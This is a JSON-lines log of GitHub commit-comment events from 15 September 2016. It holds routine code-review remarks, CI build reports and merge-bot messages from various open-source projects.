{"id":"4570626236","type":"CommitCommentEvent","actor":{"login":"BChip"},"repo":{"name":"BChip/GIFifai"},"payload":{"comment":{"id":19044330,"position":5,"line":64,"path":"inc/requests.php","commit_id":"9a37591a1e03d5f88e1c89873d41048c2dce9508","created_at":"2016-09-15T20:45:40Z","updated_at":"2016-09-15T20:45:40Z","body":"Testing new GitHub functionality"}},"created_at":"2016-09-15T20:45:40Z"}
{"id":"4570626727","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044332,"position":null,"line":null,"path":null,"commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:45:46Z","updated_at":"2016-09-15T20:45:46Z","body":"33 Linter errors."}},"created_at":"2016-09-15T20:45:46Z"}
{"id":"4570628229","type":"CommitCommentEvent","actor":{"login":"ShatteredMotion"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19044336,"position":null,"line":null,"path":null,"commit_id":"f6826d608bfa76ba592dffb7847ea8e4662ae387","created_at":"2016-09-15T20:46:05Z","updated_at":"2016-09-15T20:46:05Z","body":"No need for two separate queries, just make the first query a subquery 😄 "}},"created_at":"2016-09-15T20:46:05Z"}
{"id":"4570628491","type":"CommitCommentEvent","actor":{"login":"xamgore"},"repo":{"name":"AlexandraOlegovna/ComputerGraphics"},"payload":{"comment":{"id":19044342,"position":24,"line":24,"path":"CG_Task1/CG_Task1/Form1.cs","commit_id":"67e35c3dcbdbd9c42c11cbd4f09914a9f0ff1350","created_at":"2016-09-15T20:46:08Z","updated_at":"2016-09-15T20:46:08Z","body":"Why don't you use the `Point` class here?"}},"created_at":"2016-09-15T20:46:08Z"}
{"id":"4570631258","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19044346,"position":null,"line":null,"path":null,"commit_id":"ef7577f5e48ad1e72a49e672e1eabd5b7d345b4d","created_at":"2016-09-15T20:46:37Z","updated_at":"2016-09-15T20:46:37Z","body":"This is quite interesting ! Good luck !"}},"created_at":"2016-09-15T20:46:37Z"}
{"id":"4570634019","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044351,"position":29,"line":29,"path":"server/app/routes/products/index.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:47:06Z","updated_at":"2016-09-15T20:47:06Z","body":"Can use a `findById`"}},"created_at":"2016-09-15T20:47:06Z"}
{"id":"4570638781","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19044362,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-15T20:47:55Z","updated_at":"2016-09-15T20:47:55Z","body":"Use 'isreallynetworkmultiplayer'"}},"created_at":"2016-09-15T20:47:55Z"}
{"id":"4570639473","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19044365,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-15T20:48:02Z","updated_at":"2016-09-15T20:48:02Z","body":"I'll merge and upload later today, yep."}},"created_at":"2016-09-15T20:48:02Z"}
{"id":"4570640265","type":"CommitCommentEvent","actor":{"login":"jedmccaleb"},"repo":{"name":"vogel/stellar-core"},"payload":{"comment":{"id":19044368,"position":null,"line":null,"path":null,"commit_id":"900eecbd54fa3c8ca527319a58f5c750ab0771b7","created_at":"2016-09-15T20:48:11Z","updated_at":"2016-09-15T20:48:11Z","body":"r+"}},"created_at":"2016-09-15T20:48:11Z"}
{"id":"4570641580","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044371,"position":42,"line":42,"path":"server/app/routes/products/index.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:48:24Z","updated_at":"2016-09-15T20:48:24Z","body":"Nice `returning: true`"}},"created_at":"2016-09-15T20:48:24Z"}
{"id":"4570643450","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19044376,"position":null,"line":null,"path":null,"commit_id":"9e47b9655b84d968d15ea8fdcc32f3ac40c582ef","created_at":"2016-09-15T20:48:45Z","updated_at":"2016-09-15T20:48:45Z","body":"Related to: backdrop/backdrop-issues#2188 "}},"created_at":"2016-09-15T20:48:45Z"}
{"id":"4570643508","type":"CommitCommentEvent","actor":{"login":"xamgore"},"repo":{"name":"AlexandraOlegovna/ComputerGraphics"},"payload":{"comment":{"id":19044378,"position":26,"line":26,"path":"CG_Task1/CG_Task1/Form1.cs","commit_id":"67e35c3dcbdbd9c42c11cbd4f09914a9f0ff1350","created_at":"2016-09-15T20:48:45Z","updated_at":"2016-09-15T20:48:45Z","body":"Did you know that usage of standard names like `Form1`, `pictureBox1_MouseDown` is considered to be a bad practice?"}},"created_at":"2016-09-15T20:48:45Z"}
{"id":"4570644337","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044380,"position":43,"line":43,"path":"server/app/routes/products/index.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:48:54Z","updated_at":"2016-09-15T20:48:54Z","body":"Since it doesn't *directly* return the product, maybe rename this? Also: for fun, check out ES6 **destructuring.**"}},"created_at":"2016-09-15T20:48:54Z"}
{"id":"4570645630","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19044386,"position":null,"line":null,"path":null,"commit_id":"e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff","created_at":"2016-09-15T20:49:10Z","updated_at":"2016-09-15T20:49:10Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2367 of 2368 tests passed, 21 test warnings)\n\n * 22 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T20:49:10Z"}
{"id":"4570646125","type":"CommitCommentEvent","actor":{"login":"rezso"},"repo":{"name":"uhulinux/ub-ubk1"},"payload":{"comment":{"id":19044389,"position":null,"line":null,"path":null,"commit_id":"a8c65b4296ce37255860dfb6f08b750912f047c1","created_at":"2016-09-15T20:49:14Z","updated_at":"2016-09-15T20:49:14Z","body":"A sed helyett egy patch talán jobb lenne."}},"created_at":"2016-09-15T20:49:14Z"}
{"id":"4570649160","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044398,"position":60,"line":60,"path":"server/app/routes/products/index.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:49:48Z","updated_at":"2016-09-15T20:49:48Z","body":"This kind of thing probably should be a query string in the get all route, not a separate URI."}},"created_at":"2016-09-15T20:49:48Z"}
{"id":"4570651068","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19044401,"position":null,"line":null,"path":null,"commit_id":"900eecbd54fa3c8ca527319a58f5c750ab0771b7","created_at":"2016-09-15T20:50:12Z","updated_at":"2016-09-15T20:50:12Z","body":"saw approval from jedmccaleb\nat https://github.com/vogel/stellar-core/commit/900eecbd54fa3c8ca527319a58f5c750ab0771b7"}},"created_at":"2016-09-15T20:50:12Z"}
{"id":"4570651116","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19044402,"position":null,"line":null,"path":null,"commit_id":"900eecbd54fa3c8ca527319a58f5c750ab0771b7","created_at":"2016-09-15T20:50:12Z","updated_at":"2016-09-15T20:50:12Z","body":"merging vogel/stellar-core/ntp-check = 900eecbd into auto"}},"created_at":"2016-09-15T20:50:12Z"}
{"id":"4570651140","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19044403,"position":null,"line":null,"path":null,"commit_id":"900eecbd54fa3c8ca527319a58f5c750ab0771b7","created_at":"2016-09-15T20:50:13Z","updated_at":"2016-09-15T20:50:13Z","body":"vogel/stellar-core/ntp-check = 900eecbd merged ok, testing candidate = f667ec9b"}},"created_at":"2016-09-15T20:50:13Z"}
{"id":"4570654002","type":"CommitCommentEvent","actor":{"login":"jwendell"},"repo":{"name":"jboss-openshift/ce-arq"},"payload":{"comment":{"id":19044408,"position":44,"line":208,"path":"utils/src/main/java/org/jboss/arquillian/ce/adapter/AbstractOpenShiftAdapter.java","commit_id":"9bbcf99ea16daaf6982a799900f96d4768b691e9","created_at":"2016-09-15T20:50:38Z","updated_at":"2016-09-15T20:50:38Z","body":"Jolokia?"}},"created_at":"2016-09-15T20:50:38Z"}
{"id":"4570658883","type":"CommitCommentEvent","actor":{"login":"justintoo"},"repo":{"name":"rose-compiler/rose-develop"},"payload":{"comment":{"id":19044423,"position":23,"line":985,"path":"src/util/Sawyer/BitVectorSupport.h","commit_id":"baf7736a9dc6daff6629efeeccae3bf57bd3189a","created_at":"2016-09-15T20:51:27Z","updated_at":"2016-09-15T20:51:27Z","body":"Issue #14 "}},"created_at":"2016-09-15T20:51:27Z"}
{"id":"4570660552","type":"CommitCommentEvent","actor":{"login":"rmortan"},"repo":{"name":"rmortan/INTRO"},"payload":{"comment":{"id":19044428,"position":null,"line":null,"path":null,"commit_id":"db83130e3dffa6a935473354543e9efc28e57036","created_at":"2016-09-15T20:51:45Z","updated_at":"2016-09-15T20:51:45Z","body":"LIFE \r\ni have to say some times a little RWD is all you need for a good responce"}},"created_at":"2016-09-15T20:51:45Z"}
{"id":"4570660826","type":"CommitCommentEvent","actor":{"login":"vdumont"},"repo":{"name":"mapbox/spritezero-cli"},"payload":{"comment":{"id":19044429,"position":null,"line":null,"path":null,"commit_id":"c92587ad69555b050797762044bd415c3d935c1f","created_at":"2016-09-15T20:51:48Z","updated_at":"2016-09-15T20:51:48Z","body":"@bhousel Mmmm we probably need to release 1.1.2 with spritezero pinned to 3.7.x otherwise spritezero-cli 1.1.x will pick up spritezero 3.8 as well :/"}},"created_at":"2016-09-15T20:51:48Z"}
{"id":"4570660855","type":"CommitCommentEvent","actor":{"login":"yulining"},"repo":{"name":"QuantLet/TENET"},"payload":{"comment":{"id":19044430,"position":null,"line":null,"path":null,"commit_id":"ba3639494074bd1ec0ac2561c05e161519c3f582","created_at":"2016-09-15T20:51:48Z","updated_at":"2016-09-15T20:51:48Z","body":"Required Change by WKH\r\nWKH asked me to change the format of title picture (the blue bar with HU Logo) in REDAME files of TENET repository. Now they are consistent with the current broader verion."}},"created_at":"2016-09-15T20:51:48Z"}
{"id":"4570662761","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"thc202/zaproxy"},"payload":{"comment":{"id":19044438,"position":6,"line":607,"path":"src/org/apache/commons/httpclient/HttpMethodDirector.java","commit_id":"8657076905f7fa5f45f85d7946ff2671ee7556b9","created_at":"2016-09-15T20:52:11Z","updated_at":"2016-09-15T20:52:11Z","body":"Remove this blank too? Just so the doc doesn't seem orphaned"}},"created_at":"2016-09-15T20:52:11Z"}
{"id":"4570663836","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19044442,"position":null,"line":null,"path":null,"commit_id":"fe39ff1b4c6afa6c6813595d2d3dafb9a49efc4e","created_at":"2016-09-15T20:52:22Z","updated_at":"2016-09-15T20:52:22Z","body":"I bet Map uses referential equality, which we don't have on these arrays."}},"created_at":"2016-09-15T20:52:22Z"}
{"id":"4570663908","type":"CommitCommentEvent","actor":{"login":"ColeCooper"},"repo":{"name":"jcfleischli/SWS-Project-1"},"payload":{"comment":{"id":19044443,"position":null,"line":null,"path":null,"commit_id":"c16cf3f6900d14c9273209a933623db25b4a6589","created_at":"2016-09-15T20:52:23Z","updated_at":"2016-09-15T20:52:23Z","body":"Hey guys \r\n"}},"created_at":"2016-09-15T20:52:23Z"}
{"id":"4570664333","type":"CommitCommentEvent","actor":{"login":"alesj"},"repo":{"name":"jboss-openshift/ce-arq"},"payload":{"comment":{"id":19044445,"position":44,"line":208,"path":"utils/src/main/java/org/jboss/arquillian/ce/adapter/AbstractOpenShiftAdapter.java","commit_id":"9bbcf99ea16daaf6982a799900f96d4768b691e9","created_at":"2016-09-15T20:52:27Z","updated_at":"2016-09-15T20:52:27Z","body":"Yes.\n\nOn Sep 15, 2016 22:50, \"Jonh Wendell\" <notifications@github.com> wrote:\n\n> Jolokia?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jboss-openshift/ce-arq/commit/9bbcf99ea16daaf6982a799900f96d4768b691e9#commitcomment-19044408>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAUQeK3X7VjjSvkD7o4i0yAmbCqilUStks5qqa-fgaJpZM4J-VsP>\n> .\n>\n"}},"created_at":"2016-09-15T20:52:27Z"}
{"id":"4570664367","type":"CommitCommentEvent","actor":{"login":"gambiteer"},"repo":{"name":"gambit/gambit"},"payload":{"comment":{"id":19044446,"position":null,"line":null,"path":null,"commit_id":"9c5e9dabdf3f3d766dfd2c0e98d459e2e40a1207","created_at":"2016-09-15T20:52:28Z","updated_at":"2016-09-15T20:52:28Z","body":"Interesting.   Why gsc would inline a local definition but not an equivalent global definition seems like a compiler bug to me.\r\n\r\nBut no, I haven't measured performance."}},"created_at":"2016-09-15T20:52:28Z"}
{"id":"4570666117","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"thc202/zaproxy"},"payload":{"comment":{"id":19044449,"position":10,"line":302,"path":"src/org/parosproxy/paros/extension/history/BrowserDialog.java","commit_id":"8657076905f7fa5f45f85d7946ff2671ee7556b9","created_at":"2016-09-15T20:52:50Z","updated_at":"2016-09-15T20:52:50Z","body":"This line too?"}},"created_at":"2016-09-15T20:52:50Z"}
{"id":"4570666937","type":"CommitCommentEvent","actor":{"login":"SunnyChahal"},"repo":{"name":"corwin86/FieryJaguar7"},"payload":{"comment":{"id":19044450,"position":null,"line":null,"path":null,"commit_id":"a634b2e4796bfa1b3e6e723dcbba96cf34d2aff2","created_at":"2016-09-15T20:52:59Z","updated_at":"2016-09-15T20:52:59Z","body":"cool"}},"created_at":"2016-09-15T20:52:59Z"}
{"id":"4570668490","type":"CommitCommentEvent","actor":{"login":"Jhno591"},"repo":{"name":"Jhno591/citra"},"payload":{"comment":{"id":19044457,"position":null,"line":null,"path":null,"commit_id":"5f775188f9080ec1e7088b55a3f1c89af8dd97fd","created_at":"2016-09-15T20:53:17Z","updated_at":"2016-09-15T20:53:17Z","body":"Rebuild - \"oranges\" , Jit , cheats , frame layout , Graphics"}},"created_at":"2016-09-15T20:53:17Z"}
{"id":"4570670821","type":"CommitCommentEvent","actor":{"login":"jcfleischli"},"repo":{"name":"jcfleischli/SWS-Project-1"},"payload":{"comment":{"id":19044464,"position":null,"line":null,"path":null,"commit_id":"c16cf3f6900d14c9273209a933623db25b4a6589","created_at":"2016-09-15T20:53:42Z","updated_at":"2016-09-15T20:53:42Z","body":"Hey"}},"created_at":"2016-09-15T20:53:42Z"}
{"id":"4570673074","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19044467,"position":null,"line":null,"path":null,"commit_id":"e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff","created_at":"2016-09-15T20:54:08Z","updated_at":"2016-09-15T20:54:08Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T20:54:08Z"}
{"id":"4570673632","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"thc202/zaproxy"},"payload":{"comment":{"id":19044471,"position":3,"line":74,"path":"src/org/zaproxy/zap/view/ContextExcludePanel.java","commit_id":"8657076905f7fa5f45f85d7946ff2671ee7556b9","created_at":"2016-09-15T20:54:13Z","updated_at":"2016-09-15T20:54:13Z","body":"Remove this blank"}},"created_at":"2016-09-15T20:54:13Z"}
{"id":"4570677206","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19044484,"position":null,"line":null,"path":null,"commit_id":"a07d282b31be1d17f4fba6b65aadc7862cf9db41","created_at":"2016-09-15T20:54:52Z","updated_at":"2016-09-15T20:54:52Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2305 of 2472 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a07d282b31be1d17f4fba6b65aadc7862cf9db41-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a07d282b31be1d17f4fba6b65aadc7862cf9db41-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.24%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T20:54:52Z"}
{"id":"4570683959","type":"CommitCommentEvent","actor":{"login":"nidico"},"repo":{"name":"KDE/marble"},"payload":{"comment":{"id":19044496,"position":null,"line":null,"path":null,"commit_id":"7fc3301af5cffc0be860e7f0008294e3e909db6f","created_at":"2016-09-15T20:56:04Z","updated_at":"2016-09-15T20:56:04Z","body":"Shameless comment ping, as I can't contact you in any different way... Please write an email to me, Bernhard. And feel free to delete this comment; btw marble is awesome ;)"}},"created_at":"2016-09-15T20:56:04Z"}
{"id":"4570689916","type":"CommitCommentEvent","actor":{"login":"juliosibaja"},"repo":{"name":"juliosibaja/IA2016.2"},"payload":{"comment":{"id":19044510,"position":null,"line":null,"path":null,"commit_id":"2dc2b93b2c9a74fa11cf916f7db9fa639d42bf0f","created_at":"2016-09-15T20:57:11Z","updated_at":"2016-09-15T20:57:11Z","body":"Adding lista1 and readme"}},"created_at":"2016-09-15T20:57:11Z"}
{"id":"4570690608","type":"CommitCommentEvent","actor":{"login":"kaganjd"},"repo":{"name":"kaganjd/p5.js-web-editor"},"payload":{"comment":{"id":19044512,"position":null,"line":null,"path":null,"commit_id":"4119d91812c6adcf13a297ac256811a5bbc7cd62","created_at":"2016-09-15T20:57:19Z","updated_at":"2016-09-15T20:57:19Z","body":"TODO\r\n- [ ] replace 'x' with trash can svg\r\n- [ ] line 47: figure out src (see `exitUrl` for example)\r\n- [ ] line 66: figure out where `deleteSketch` is defined\r\n- [ ] server side stuff tbd"}},"created_at":"2016-09-15T20:57:19Z"}
{"id":"4570707334","type":"CommitCommentEvent","actor":{"login":"renalid"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19044544,"position":45,"line":42,"path":"youtube_dl/extractor/franceinter.py","commit_id":"0002962f3feb86ec8c14429af7ecddc17815fa93","created_at":"2016-09-15T21:00:14Z","updated_at":"2016-09-15T21:00:14Z","body":"Hello,\r\nI found an issue here. If we are between january (1) and september (9) month, the 0 missed finally in the upload_date variable.\r\n\r\nexample url : https://www.franceinter.fr/emissions/la-tete-au-carre/la-tete-au-carre-14-septembre-2016\r\n\r\n'upload_date': '**2016914**' vs. _20160914_ expected\r\n"}},"created_at":"2016-09-15T21:00:14Z"}
{"id":"4570720499","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19044572,"position":null,"line":null,"path":null,"commit_id":"908f1b75243f5a6f92cf374b6eff2a4bb540e450","created_at":"2016-09-15T21:02:30Z","updated_at":"2016-09-15T21:02:30Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1763 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-15T21:02:30Z"}
{"id":"4570721723","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044577,"position":16,"line":16,"path":"server/app/routes/signup.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T21:02:42Z","updated_at":"2016-09-15T21:02:42Z","body":"Again, `.sanitize`"}},"created_at":"2016-09-15T21:02:42Z"}
{"id":"4570722985","type":"CommitCommentEvent","actor":{"login":"markocupic"},"repo":{"name":"contao/core"},"payload":{"comment":{"id":19044580,"position":null,"line":null,"path":null,"commit_id":"e29de00cf7d888a6c60d2db76f40ade3a7d05310","created_at":"2016-09-15T21:02:55Z","updated_at":"2016-09-15T21:02:55Z","body":"Hi Leo\r\nWill this bugfix be available although vor contao 4.2?\r\nRegards Marko"}},"created_at":"2016-09-15T21:02:55Z"}
{"id":"4570724483","type":"CommitCommentEvent","actor":{"login":"cpacia"},"repo":{"name":"david415/ipfs-onion-transport"},"payload":{"comment":{"id":19044584,"position":43,"line":87,"path":"onion_transport.go","commit_id":"a7378ff732b5ab1091574505b1b1845b72cafcd9","created_at":"2016-09-15T21:03:13Z","updated_at":"2016-09-15T21:03:13Z","body":"Couple questions. \r\n\r\nDoesn't look like `LoadKeys()` is called. Should this be called in `NewOnionTransport` or called manually?\r\n\r\nAlso, a comment above says leave keysDir as \"\" to generate a key, but I'm not seeing any code to generate a key (unless I missed it). Should that key be generated in this function?"}},"created_at":"2016-09-15T21:03:13Z"}
{"id":"4570733413","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044600,"position":17,"line":17,"path":"server/db/index.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T21:04:46Z","updated_at":"2016-09-15T21:04:46Z","body":"Often nice to also have `Review.belongsTo(User)` to get the other direction methods."}},"created_at":"2016-09-15T21:04:46Z"}
{"id":"4570734192","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19044602,"position":null,"line":null,"path":null,"commit_id":"e6722d3cebbd94e1d3a75b9eced3e9bde64cd0f3","created_at":"2016-09-15T21:04:55Z","updated_at":"2016-09-15T21:04:55Z","body":"Related to: backdrop/backdrop-issues#1361 "}},"created_at":"2016-09-15T21:04:55Z"}
{"id":"4570735026","type":"CommitCommentEvent","actor":{"login":"bhousel"},"repo":{"name":"mapbox/spritezero-cli"},"payload":{"comment":{"id":19044603,"position":null,"line":null,"path":null,"commit_id":"c92587ad69555b050797762044bd415c3d935c1f","created_at":"2016-09-15T21:05:04Z","updated_at":"2016-09-15T21:05:04Z","body":"> Mmmm we probably need to release 1.1.2 with spritezero pinned to 3.7.x otherwise spritezero-cli 1.1.x will pick up spritezero 3.8 as well :/\r\n\r\nGood point.."}},"created_at":"2016-09-15T21:05:04Z"}
{"id":"4570736276","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19044606,"position":null,"line":null,"path":null,"commit_id":"a50eadb1622126cc689ee89ca76b3270e3d16f95","created_at":"2016-09-15T21:05:18Z","updated_at":"2016-09-15T21:05:18Z","body":"makingPrettyTransition (mjwitte) - x86_64-MacOS-10.9-clang: OK (2323 of 2330 tests passed, 3 test warnings)\n\n * 10 tests had: AUD diffs.\n * 10 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T21:05:18Z"}
{"id":"4570737527","type":"CommitCommentEvent","actor":{"login":"shalewagner"},"repo":{"name":"IsantePlus/openmrs-module-isantepluspatientdashboard"},"payload":{"comment":{"id":19044610,"position":2,"line":2,"path":"omod/src/main/webapp/resources/htmlforms/Vaccination.xml","commit_id":"d552abd49e3549524518779e1ebe2d46d1142280","created_at":"2016-09-15T21:05:32Z","updated_at":"2016-09-15T21:05:32Z","body":"K-joseph,\n\n\nI'm not sure of the context of this email exchange (even whether it is by you or for you), but it reminded me to get back on the issue of standard generation of object types across all iSantePlus sites.\n\n\nAs I hope you saw in the recent email I've exchanged with Guerschon and the other developers, I proposed a comprehensive way to define what I would call metadata for the isante forms that will be migrated to isanteplus. I believe you suggested that these be linked via UUID rather than using the approach I proposed. I don't think your alternative will work without needless complexity, since aren't UUIDs best thought of as universally unique? I don't think that that is what we want for iSantePlus metadata in general.\n\n\nIn order to implement replication across all sites, I believe a common set of metadata objects that can be made part of the initial OpenMRS schema when iSantePlus is installed at each site is highly desirable. That seems to me to suggest NOT using UUIDs for linkage.\n\n\nOn the other hand, UUIDs are highly useful for migrating data from iSante to iSantePlus. Patients and encounters from iSante have UUIDs that can be transferred over to the new database and will automatically provide an easy way to do joins and verify correctness of the migrated data.\n\n\nThere are other keying, indexing, and referential integrity questions involved with migrating the data and replicating it in OpenMRS that we will get to once the October demo is done.\n\n\nPlease give your thoughts on the above. If I haven't explained clearly why my approach makes sense, feel free to explain your approach in more detail.\n\n\nThanks,\n\n\nSteve\n\n________________________________\nFrom: k-joseph <notifications@github.com>\nSent: Thursday, September 15, 2016 1:25:35 PM\nTo: IsantePlus/openmrs-module-isantepluspatientdashboard\nSubject: Re: [IsantePlus/openmrs-module-isantepluspatientdashboard] Update Vaccination.xml (d552abd)\n\n\n@jamesfeshner<https://github.com/jamesfeshner> these lines are very crucial to make sure our forms are created well with right properties, please make sure you don't copy paste from your local environment to these files, just modify them line after line not to bring in this confusion. Am skipping your commit to make sure we do this rightly, am going to reset this commit and please instead use pull requests so that i can review first and make it easy to resolve merge conflicts now that we are contributing to the same module together\n\n-\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub<https://github.com/IsantePlus/openmrs-module-isantepluspatientdashboard/commit/d552abd49e3549524518779e1ebe2d46d1142280#commitcomment-19043991>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AIm_RveYHgTOaiZ2miM1bf177cRZCzPNks5qqam_gaJpZM4J-UAU>.\n"}},"created_at":"2016-09-15T21:05:32Z"}
{"id":"4570742696","type":"CommitCommentEvent","actor":{"login":"thijstriemstra"},"repo":{"name":"FooDeas/raspberrypi-ua-netinst"},"payload":{"comment":{"id":19044633,"position":null,"line":null,"path":null,"commit_id":"d7d670f459dbc8ef975d192f902d419a01d628a0","created_at":"2016-09-15T21:06:26Z","updated_at":"2016-09-15T21:06:26Z","body":"I was actually using the .img as described in the osx section: `sudo dd bs=1m if=/path/to/raspberrypi-ua-netinst-<latest-version-number>.img`"}},"created_at":"2016-09-15T21:06:26Z"}
